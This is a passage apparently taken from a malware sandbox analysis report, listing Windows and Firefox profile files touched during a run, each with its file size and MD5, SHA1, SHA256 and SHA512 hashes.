9ff83396bb3f997db1e9a74a2eb3fbdff5e44ce37855ac066f903a57d0fa9525

SHA512
ba8cd57ff4fb41aabc861dc0ba636e04537ad18caf2c3363c124e9542770a52c8b74a8d066d41360d8d9ce9d961ab30bb43c99b4af9a532e511e0c428ee80c51

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
9KB

MD5
41b5cf08572e458298eb4101bbc61670

SHA1
744c33da73fd0a7b78b32ca6462314c699a25caf

SHA256
489bbda9136503f905c387dcb98ad5a2d60b526f59177008fa27d60723934f1e

SHA512
6f18f82d5229cc6cb3bc22453a228cbad55de4dc030e480e40c5bfbac14b524d36b72ce9ba4be5930032d71d230fddf70e5009840b96d7d8caef7fbc7cce1551

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
48c6a6ffd83eaed8106648de7d8012fd

SHA1
5016ced2f3142fad499c3720c87f25504512ca60

SHA256
ada87527575e7b63f44850336be9c7cf344b7dcf231229e02ddd529958acfc9a

SHA512
73a273868d007c613d9013bb0e0f1f5fda74227e94f6adf41602c63a545214548598cc2a7b92bd9e5e446bbb16ed3ff20bf00f89df757b29e176155f1840446e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
a5999afe517f4bad572b4216cf227832

SHA1
22268f26a3f154398c807c08a95165d53ea58223

SHA256
b788e8b152d5bc8e7122da52145c98215bed3d4e1aa8d729fa8b20f0f5022e82

SHA512
50c01dc5398b91e556cac34bca136c6a3ee2e7fd3ff55ec237348a29217404d9a687f53703ac46e1e01cd91c94aa397e01314319ee956ce438569c7f0231ea7b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
5406681438be903a9186910eb2871756

SHA1
20a884346e29821b9ef21fb14a160986af4ca6bf

SHA256
e44503a98dc1e976b72d0c8ccf7df54407ed867eefa58cbfee1ce2149de23ab0

SHA512
ad8bac480eef3133769d73d30d4cb1a52d29e9f33fd8a3494107d34baa4c62b01c3f3a1c23a5753f2b8b2db798bff954151c825f739c829d56b49cfca0de7963

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
e66eb280fccce98df03c9a691eac587e

SHA1
0866c300eaffe33a1c65466c78b8335b993304ba

SHA256
680bddd3c4e53e54e023a40c085a23967c9e8be81619e29737b62aec91125c37

SHA512
c520e5f7ba35c441280a16dc6326ed230afccb982a3eb1e15183954c43a219b2939fc7a955350d7ec581b9138c9fec408f34cbb36524152debb7058ec8fd865c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
633fbcc6eb32504408672afa28015750

SHA1
42081ddb167c4564069151eeecdc3b43f305df95

SHA256
74cd71b2dd3d35b6bd6ff53f78701e042bb34090fe14f517a1bb18b865299865

SHA512
6c97cdfa154c4037337fb5318d7bbd64bbf31d968177edfc9fe5bca385dad8349ae427af0d177c31798cbfbd307127be0105f05f862b937e054c71fa6f8e0f8d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
989a7dd0593e7ca3afa24a3a43bb4283

SHA1
2e31604274b04b90e05ffcebbd6fac0fd3f75a0e

SHA256
b924e4c8a79c4be2d611ef81ce7825987897eba0eb54a1dbbed212f2417197f3

SHA512
5fe539f4a3dc0adee38d4b5a88ad54da9ad034b5bb6f0f570f2a259de3644627495bfcc27bfa24750a6d27976ef121742c794fd05d6a02ab8957b53504d4e6fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
5b7dde6f9cfc704844388f29beb6e399

SHA1
ca984462cca495e560921a6108f3cf34afbe187b

SHA256
5c27d8a61a26a8d3f47475a5ffb773e0f187918b243b8f1877bfc3ce596e76c5

SHA512
086e0a00e0b87f9e1908646bd40400edf5b81123813e4e8a9e555a4c52b019bfd2ccccdddd67cece4f0a9542f63c7679689d9f2760e7d8daaaa7ab78d6e16082

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
d6ea56fd7b17d1683fc69a57f8077571

SHA1
6ba18b919ad25f1e0b127d305e0972b50facd5d3

SHA256
c24656ec02507f54e2ed77710e888f71622c785cb91e909717c922864ac30765

SHA512
730f6b6cb4ba0aecfc8c90391892535d0e42a545e67b7ad1e11aadeaefd5369f1cc4a42f1e023eae857ab6fb3875595d8b85e278d2736fbcce9caa8e24c3b635

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
0d7fdbb7612b2d128418e4fa642570cb

SHA1
0bcf45675bce7d6a2e79be8eb867dc5d8ccc4c9f

SHA256
ef58b6c54e3322301102c25b0625aee9b03730ad96e66ea7cb6555c4e60c61c5

SHA512
bc9bd7d12af4f50e85bbe73f3f737dafc7c855e2c81cb95cd3809df07865f51dbf4d84b41ee95c9e5cc1cf9a54ce7ebb3a673908ba2ed4373717b85765a07706

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
43ca8293e4a029aa98233b4e730853e9

SHA1
6d3740d776b5d7b191ef73686141dbd450c1a895

SHA256
94083b18095284f56eddf158046cf521e70d2e685676b25ea9acccf020649fd3

SHA512
1987c727bb37dd6eec67c0c547484a0d615d7726e7d23b100ce9f60708a8353786f0f97bec318014ba5b264b853d4d11dda2e651d6641e280778c9475bc2dfdd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
68a06e4ed5524f1d80ba7b18c68d40dc

SHA1
3daeffd5494cd6bd6ff0fb4d997140263597423b

SHA256
c9ee715dc3fd31d217386d4b2157ee440c452ef20c8b755794fbe45a53f6278c

SHA512
0edf2a897b90b5b33c6d965807e45c04a92a0ba084a2cbe58273267c5da331d0c24e3facdb0ff43d690ac53533a4fdb095b0ba888066a8ca19006e85e2cc0123

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
afb0992e458ad0a0d749dd4c69066cbe

SHA1
d7249df76c84ae6d35203f43e67d5ba68ad34b88

SHA256
f44c4ba943dfac7e82a4793b5ac7e21cf7913b10e2fd359cc2efe52344b98f33

SHA512
3c20af14583f602fdd9167bf9522ca81cb524cdf4ad96fc7f1647f9b81f44325c767aa2fa8514dbe60e1d055cf5e9ca6298b4511e594bb7456057a990fda9f31

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
7KB

MD5
d3354daa28d94f8066f51547465bbc48

SHA1
e701f61ab09ac357486db06b94292aedbed2d673

SHA256
638838676f1c959642e59384aab12bff8d2db593af3a3745f2124443ceef5864

SHA512
c7206a682afd9deee293a52e3d98c14b415b4c4a887875cc4ebb814fe84c0a73f330740b3796b59ed785a4bcaf4f354eb9f2b8c5e07842c17c3c09947b06cd89

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
8KB

MD5
a4b9736015a3bc55d7803c923c6c86ff

SHA1
91eb3e0181c148afa1b34a9935af2818552174ab

SHA256
5a610cfe193907475e646d55c340fc7ffae564cf6b9266583ec8fe8f341e9f81

SHA512
8ac11abe0bdca3a590f0cf9d51f19b903d4e8bd627821e61d31c1e198c91ba4d8b03f26dfbfe6d936a086e451a14d4fc89d78ac2479796afbad32b06a367d5ee

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
12KB

MD5
237f60dc30fcad497dceeab9217cca42

SHA1
947386f4ab5fe6061a80f804b9705f0b616c5ccf

SHA256
5a173291601f1b234ae4ad141bc1683752bcf3b7f6091284148eff42f7454c52

SHA512
09f16f6a5b5b6df9a7f1386b89e38f21bbf4aefb5136bae71d35c2fb8fcb5e504e6c9e2671a011eee09b5931446bebb3003d3221e3f3361e10c6a83fe092bc4e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
12KB

MD5
45751f795dee5c82721692185a2780e6

SHA1
cbebf2bc3033c5d58805a5e78689ee1755cf1601

SHA256
d0491c4dd3ff47feb773ed39152aca314283bd81044ac5f457f84827ce44a0ea

SHA512
7a6d3e6093f5c5e82d0770157de3fcfbcabb77f668937fd71a03b03ad846c9bd1d0d5dc0e002490fcd2137e192bd0c007df5fb06a4376e341931135e009c48d7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
12KB

MD5
efc4c4f391f1f350179cf3211ad55123

SHA1
b9d83cf3b9f44898a831a8c2a91a241a32c96e0f

SHA256
64e2fe7e8eeb5faa67be22c665dbbb213a27e0a742cf4219a140bdacbf86e6e7

SHA512
d023659ffae8366fbf44b4bc006a4f88c0d974915b449588a56898d57a0c483be00c5b93a316a0ac8de823d7d2dc5328e452f865718096f8d105567cacce6137

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\AlternateServices.bin

Filesize
16KB

MD5
b161a4487373320b7f8a5c136c5a6b44

SHA1
40097e0fbb64cc04c614b7a4a4779aaf82063540

SHA256
9aab7865992d1c5d21575f487bf6153e4c03f1ae586e1e1e28090a9e6e2964f9

SHA512
f72eff7708eae5d938d007efcacbc381593bc0fed5c48e9c6c28a4544f2d67da94bab7c1597e6ad362acc2b9b3f37e674122656a4a41bd277168e5f28dc53564

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\cookies.sqlite

Filesize
96KB

MD5
06635afa5d0898dbe6b93eaac51ebf48

SHA1
a8d3bf5101ed3147be305864694ba2fdc96550cd

SHA256
8a3ebd039f9ecd825b09300ff9fc639dc7a8e70a6bb16547bac829da64367855

SHA512
88d35cae1539481a1257c19d549304b45ff75dc3f5c8b3243d407a36af29fc4315c4ab0328464cdffa92ae5bb9b3023582ce6e0335c3978bf906fd30a72a0d1f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\crashes\store.json.mozlz4

Filesize
6KB

MD5
0e67b8404796a508524c03118c8b2655

SHA1
f008cbad8d07e4d7c9481a0458409c20dcef4d32

SHA256
f71986ef023f0f4ea4eed9adfa7e896e1913d71eaaa9a058636b061deb06b813

SHA512
a76e7574ef0ad9ea8c5176c6aa010ccc01607706f44e15d83bfb1d7305cc4938c31fd965ceab8156a7f2204b6db662f86c4f685c297d24822c7a74b2ffbd71d7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\db\data.safe.tmp

Filesize
24KB

MD5
fc836e85e02b9cfb45a4326fcb7253f5

SHA1
b299b790ea454cad3f7827c082201f1bb98efa9c

SHA256
11724381ea102aa3a3b51a36b5e5f049f41526864823980d68dce6f29ef76b46

SHA512
2e58cc088c8e5e6eb0542eda9be116e55530b1f3e7429d9654655d2567ec3a25d0d183d77bfac615827521d64c8137b104393dc7e5c13a50c95cce797d520a02

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\db\data.safe.tmp

Filesize
21KB

MD5
5c63afafb176ecb75aca4122f665bd93

SHA1
2902fa53a5e0e8b344bf45daaa0bee332fe0d180

SHA256
9aba76a53dc61001d7ef7be1b769f493b9d458547fd085d7832ee9dab6de97d7

SHA512
5491d88c845970f6bf9328f8d7db1ab7a417f411f18b400906d12e9a368ae0489208424462f9d9480fa9f653fce504c2fd06bfc422f8c84cfa5828a524c62e09

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
f4fc0d8765fd7e82e5724aa2df7e312c

SHA1
51267b4f21d99956b8e471b301aef4c7dca89850

SHA256
8fd3aaf7fbed1df08d9b293c52a0898562f5a8d2bba031f0399b33ce6ab48740

SHA512
463be047469d55b1e5230a9a8c32a1a4ff3dd6e707e0a3b15ed5172b31d10ffd51f2d8496a341fe34850853b50fcd3d6f7095bd795aed26058b0cc8c0ac8a487

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
42fd271928bf9490d50914bd0fec0524

SHA1
33e49b89b08d7ce3dc282c73d8318f0073479ec4

SHA256
7fa1bbe527f1d37c61d7f8810e859633af826a9a07e43e6ee2793c70d4c363a0

SHA512
474be5b3af6c15a9aae42ed6688b6e3d8bed1885050777c3c2e447dff11c5959b158a8683591e560a6a5f7009b525c881c24b97fe690b85687012612ecda3bdb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
df363238ec32d87623a0f6726ffafd5b

SHA1
451379067d7f42393d8ca06618a2f6ea8e3799d2

SHA256
bc13987204541156555729cdbfd61d96a7426844a2969187aa5bf528b6ade396

SHA512
db03cb64a89638744e98cd6f743f17acacbc9a4c019aeecf378e52935b1cf55efa54e0814c73063d21fe54b10bad67b43f4a31aeae585633d0ac1bedef5f4ecb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\196167d9-22bd-423f-b191-93a6374f68eb

Filesize
653B

MD5
0b8dca3e1a44bebf4fb16873eeb6dff0

SHA1
2221af04789bf5bff129efcf6d99462a04e1e522

SHA256
dfa1900ddc4e55f4177b64c7880a90ed09e2dd9a1a9146c18b0f0da9e5c1c9fb

SHA512
635ebfec1f117b3efbb9b536c7246b9da9dfef09939ccaf0ee6afba9167e4506f7c55e6eabc3a7110aac8fcd5380d3448b999aa84b1db0a7ca08ecb4bdff5cfb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\399cec11-caea-4a38-8091-af05c2023fe2

Filesize
648B

MD5
b76adfbd1aee3c225a5d99db16638e69

SHA1
200ff5931668ed400929c96504f6e5beb0360b60

SHA256
44ea554c110658293849572a4be5f9a64a9ff183e90ec87180e4fcfdaa781855

SHA512
5312ae9b6510ae17baaebe25c271b37e1d69f4a1af97fce95c64a5a74031bde748eb91a81eacde5ee919ace09bc41bd61f4894433aafc7a13c354ab4282536f4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\3dc5864d-738a-4f18-b9f0-1f37ebb67ba7

Filesize
661B

MD5
f02d90b50390cbe095c6cd8e7740a0c6

SHA1
a1920d747ce3826ef7ddb8cff4e7e567bfc15aa1

SHA256
a30bb25f91bf7256b07ce39b1652c50ff828416072c92f417edbbf4ec2401bfe

SHA512
027d44bb2f570aae303f8adb508526cd817d190804c2e5c98515bdd3eb0fecf31783202b5ec6cf76283eec15b317d3dd4106800db99b6610b601b7190362ca83

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\407a3c7c-fb3e-4869-a4f6-c5c03b1582ac

Filesize
798B

MD5
87d95a7391e2481812751636c7c12e2d

SHA1
91171489b05eb8aff3161acd564d90f9468a6c10

SHA256
5fed5c65dc7144ecbab86bb3f8dcb6b21c2d2c3a8e917207f9f1559de22c7f30

SHA512
5ad6a138844ae0db7ad9fb2b8f460a5cd7549d6f7066f8ed6f58f0445a9130571d5a8fc93318ae0728c4c6b2907499ac492a5b885afade420f51581dcf2ff089

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\40dc252f-eac9-44a0-a70a-acedadceb0c8

Filesize
772B

MD5
10319a6aaf1f5b234d3f04bb27daef12

SHA1
2da785b2d1c53dd7bb071c19a147070e85f0e9dc

SHA256
8f868d1bfdbc7a7140f026f4fa77ccdac2fadee68ebabaee8187d4929c1a6539

SHA512
135e5f4c94e82aeb7cfe48d28a35407a0321586aa6262b138c5e21e87a3c4da579c7d942b6f92d6cba12a0029374b45883eb977db3fb422ef88efc7f878041c9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\50bc5b20-cc3a-4c4e-8416-2de8a8e26bc9

Filesize
659B

MD5
8739362b679d9acb6739cf1fc384f3c0

SHA1
a9faa393c12e547b9445fed5e0129d6f39c8e019

SHA256
9f2ec2d674921d5a0cdceccbd1a5fea92cb96737b39306340e61bc0004af3542

SHA512
324ee69184cbff3acea5b870cef0582e47af8e85d5b38bfce5a58ba93e89c26a45ea843fb6aeeb7f1371a689c3590ebb9500e80aa93a98b35409e98f4a580a9e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\78cd0039-9e72-460e-b211-6c55e82661a9

Filesize
767B

MD5
6f08fd575fe6a6075c6280e23bd7adbf

SHA1
83d3074b4e3d58b09a582abd407819f71ef7de1a

SHA256
bfa9656ddaf216696e4809f348799460cb58876cf39a58f7aa1f578e02932385

SHA512
e2b04d69ab5a6bcc1e96a25693752e4bdb984f01eb7f06482bd2728470862c8a9817cfd859398b170c0b010cba69e3b71ffe1b9c47e3f8aadd8a7e272fedddda

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\89c36a2d-6b7a-4214-8afb-f061981fbb90

Filesize
982B

MD5
cc81ba93ab7ed4bc79ae02bade9d322a

SHA1
0ad1399a0ce491f3e874333dc2d01179943aa921

SHA256
9811a38d77414211a9a965b32a0284de7b29cb3986859b7090b42a8565cbbbab

SHA512
69c9bbd61c2af0c5768e55693efd8a8c666445ac9e2df5cfdcef5888e5c3b288008749fe4b58e658858e23cf67872a72db5593cca3e9b10c47de4c5a96cf006b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\97fdcd2f-7a44-4a36-973e-3f6f82c3e180

Filesize
1KB

MD5
36c0b27d107f253684d5d88b0e515c93

SHA1
16dada1c483ccb534854cefb6e00736259b213fc

SHA256
ccad7825bf4cf1c1612e20f092ca5f2599550e2d0e6a748f284247732ac51318

SHA512
13f4f9258197379bdc2ad2bac283b0d4c51bc89195f38ba97127bc8a073c07e301e28bc7eb5f32208a6361dce24c1fcdab5438d59e52a573a4783e1efc4de419

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\a990c83b-24cb-4fe7-868c-0ea3a7ffd63b

Filesize
905B

MD5
5c94c4a4aa5e95756b2c920099fa807c

SHA1
e01e506585ed17d8a53b1024974ac108264476c6

SHA256
bb665b3c3554bea8794c43cf6015410adbce0c986a3cce1ac33e44ef857e8500

SHA512
06494f60df2750b8359211cb09a31b411d712f67ecdd7d0798427197584f76063cbc89aa60d87651cb1b3f43c26c0379fe4343a98cfc0ba754fe668beff5202b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\datareporting\glean\pending_pings\bf21f105-dfce-420c-b09b-6bd0c687887c

Filesize
772B

MD5
2e4235717b83663694d93504795364b0

SHA1
9174f544455d8d4122db65a6c7217fb2917154d5

SHA256
2234077ac571e6212714104f333e7a673d8602a01d9473df4588dc477bc0ee80

SHA512
de89aad72e3240c1cb30a2f954fd09e518aaf48b12013d8dcdfb9fb70968c5bafa1da71faba77d7a0ead0516f3a9feda3ff81e8c97829d556768d6150c41f956

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\extensions.json

Filesize
37KB

MD5
2eec420d370057a8f0ed05921e048e4f

SHA1
d3e351405ac411d33b4911b52bbf23ac8b50942b

SHA256
0419a30131a0c79b8d8c52456ed764d8150a5dba1fea47a0dbcf2226a0e7d4c1

SHA512
c84cf8b865aa6ced3894b17614122be35f81ae049d39916c76846a16241f9e6ea9f8c82124c5ec147a8e0a104a491177a747c0aa5ea0ebcd60597d2fffcf2a2b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\places.sqlite

Filesize
5.0MB

MD5
960a22fa25e54076573df851f20503d3

SHA1
f86af0f986f9c561f0ef18615ade63d9eebd3d16

SHA256
9108be81450adbcf412a4538bfa314dcaf7490a5bacff6d97382803c2e956533

SHA512
0b2adf8b3940afbc705ece28720093c17616682462e6e98731f24db35145c59acf6cbc7a3e489c350fb49acc6434e9ea95e4df04dfac03b635421cff40aa6e3e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs-1.js

Filesize
11KB

MD5
804cdd4af860931b24a5daf143bfe184

SHA1
578cc9d6f4f2e90c0a01f8d8334c7ace4caa7c74

SHA256
523a0fd303f928c01d86eb9ddc9c8dae0037d87bc5814056535c8594849bd453

SHA512
d841550931185b66fe72bc4e70b04bd4ba3215190e7d5b877b4b931b301acb8a265ca1b5f8b0f3efa42719a19fcbd6a4f354a2430230931c44c9629ba354d606

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs-1.js

Filesize
12KB

MD5
f615646059a0046b6a00805906700cad

SHA1
5567759bef9b9b4526a077a1b980f6c11be8e05b

SHA256
72daf3afdacb0b0609913cd2ffd71f634b6e2fe590e0fee5bface6b327464a0f

SHA512
aa890a09ded8568755f69ac0bc5cfda3ea281287a28a3b55cd5b524eef011ec1f0b4c55078b87ae92fe7c1959c537acbfeb34fcdb9b235da1bcf69cd7db50bd5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs-1.js

Filesize
12KB

MD5
8c7b287c186b06af1adddbe7c32549d2

SHA1
a102dfe2b831a577e9158fd8266e82016f1cf7d1

SHA256
1eec59fb2c006521cac32fd64af5a471509f87e511a317f339ec704932e81521

SHA512
1d416cd4b9e9803800936a0eae3db4adb06c3257a306e574b86c2528d00fd2fda6ce8c718db21efa0e5c340cc96bb7ca9e4327fcf69a2c6148fa7ed04d2ae66e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs-1.js

Filesize
11KB

MD5
735d9652caa5ff7f26aa2d580df64cf6

SHA1
3c44b1b6ce4e5fa2d462be6b0083e38087d8259b

SHA256
b709b800c3cf11f064b780301dfa4d8577c3f616665056f377497d6b2447b47d

SHA512
30ce5eff01b7fd32b15f0187acd0bf160ffc577d1b8e776dfebc25186d8061c39f5afd238f4e19ed83caffb69a19733339336a09c7183942eb7e83c55f3c4a34

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs.js

Filesize
12KB

MD5
6184fa0c2de97b7a0439a5bf26638d73

SHA1
8b37464cb2afc2368ae80c0e1dc4cc4b466e2873

SHA256
a6940b0e3e98959d944b13f6cbe03232df4ef25182aad98c306a713eb4018859

SHA512
8b64f04e07e19c232f168c194a3df548412717b151cdc7454bcc1020ea4cf0c2f2974aba4fa540482a1fba5e89c914f02a9bb91291b46ce50960f43dbd7b7290

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\prefs.js

Filesize
12KB

MD5
5a6ac22c967ce670dd9f2f62ccd71656

SHA1
79b0dc6dbe5d70e8403164962fe90279b09afaa4

SHA256
dd3cdf713eb1fc65322ba3f6e6701fcdf135a635a5f92185e4457a7dddc0bacb

SHA512
cfcae6adbb53790f914168cb2522aa43367065cb1f68fb4846a84f366ce732c54dc47db102b0c941f1876317d43f5ff609a7651eaad6e3745b901688966c124e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\sessionCheckpoints.json

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\sessionCheckpoints.json

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\sessionCheckpoints.json.tmp

Filesize
288B

MD5
948a7403e323297c6bb8a5c791b42866

SHA1
88a555717e8a4a33eccfb7d47a2a4aa31038f9c0

SHA256
2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e

SHA512
17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85t3rifc.default-release\sessionstore-backups\recovery.baklz4

Filesize
4KB

MD5
c9a99c6c2de1f4db466ef2e5b8609d72

SHA1
40878d7dff3fcb7eb7c6dc7eaebe5bfc463015ec

SHA256
a4b6d6383006d79bd9c8f998988fa664555ef04bbfef18873864cce889c962cc

SHA512
